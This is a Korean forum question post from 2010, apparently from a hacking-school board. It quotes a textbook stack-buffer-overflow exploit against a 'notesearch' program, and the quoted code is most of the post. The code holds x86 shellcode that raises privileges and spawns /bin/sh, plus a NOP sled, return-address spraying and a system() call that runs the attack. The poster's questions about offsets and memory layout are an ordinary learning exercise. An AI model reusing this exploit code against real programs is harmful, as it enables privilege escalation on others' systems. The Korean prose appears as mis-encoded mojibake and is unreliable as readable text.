http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1430 [º¹»ç]
À½.. ÀÏ´Ü ÀÌ ÄÚµå´Â ÇØÅ· °ø°ÝÀÇ ¿¹¼ú Ã¥¿¡ ³ª¿Â ¼Ò½ºÄÚµåÀä..
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
ÀÔ´Ï´Ù. ¿©±â¼ ÀÌÇØ°¡ ¾È°¡´Â ºÎºÐÀÌ 4°¡Áö°¡ Àִµ¥¿ä..
1. iÁÖ¼Ò¿¡¼ offset À» »« ÀÌÀ¯°¡ ¹º°¡¿ä?
2. offset Àº ¿Ö 270 Àΰ¡ ?
3. char * buffer ¿Í command ´Â µ¿ÀûÀ¸·Î ÇÒ´çµÇ±â ¶§¹®¿¡ ½ºÅÃÀÌ ¾Æ´Ñ Èü¿¡ ÇÒ´çµÇ´Â °Í ¾Æ´Ñ°¡¿ä?
±×·±µ¥ ¿Ö ¿ÀÇÁ¼ÂÀº 270À̳ª µÇ³ª¿ä ?
4.ÀÌ ÇÁ·Î±×·¥ÀÇ ¸Þ¸ð¸® ±¸Á¶°¡ ±Ã±ÝÇѵ¥¿ä
Ã¥¿¡¼º¸¸é ½ä¸Å(NOP)¸¦ ÀÌ¿ëÇؼ ½©Äڵ带 ½ÇÇà½ÃŲ´Ù°í ³ª¿ÍÀÖ½À´Ï´Ù. ±×·¯¸é
ret ÁÖ¼Ò¸¦ ½ä¸Å(NOP)°¡ ÀÖ´Â ÁÖ¼Ò·Î ¹Ù²Û´Ù -> retÁÖ¼Ò¸¦ ½ÇÇàÇØ ½ä¸Å¸¦ ź´Ù -> ½©Äڵ尡 ½ÇÇàµÈ´Ù.
ÀÌ·¸°ÔµÇ¸é ¸Þ¸ð¸®±¸Á¶´Â
(³ôÀºÁÖ¼Ò)------------ (³·ÀºÁÖ¼Ò)
ret ----NOP----½©ÄÚµå
ÀÌ·¸°Ô µÇ³ª¿ä?
Áú¹®ÀÌ ¸¹Áö¸¸ ´äº¯ºÎŹµå·Á¿ä ¤Ð
|
Hit : 3046 Date : 2010/10/02 08:51
|